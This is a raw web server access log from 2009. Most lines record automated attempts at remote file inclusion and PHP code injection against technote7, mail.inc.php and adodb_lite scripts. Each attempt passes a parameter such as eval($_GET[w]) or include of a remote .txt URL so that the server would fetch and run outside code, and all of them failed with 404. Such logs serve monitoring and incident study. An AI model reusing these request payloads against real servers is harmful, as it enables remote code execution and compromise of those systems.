65.23.158.226 - - [28/Jul/2009:01:43:01 -0400] "GET /logs/access_log.Q109051000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:01:43:01 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:01:43:01 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:01:43:10 -0400] "GET /logs/access_log.Q109050800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
203.130.198.40 - - [28/Jul/2009:01:44:35 -0400] "GET /logs/access_log.Q109070200//include/mail.inc.php?skin_board_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:01:45:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
117.110.74.195 - - [28/Jul/2009:01:45:26 -0400] "GET /logs/access_log.Q109052900/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:45:26 -0400] "GET /logs/access_log.Q109070300/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
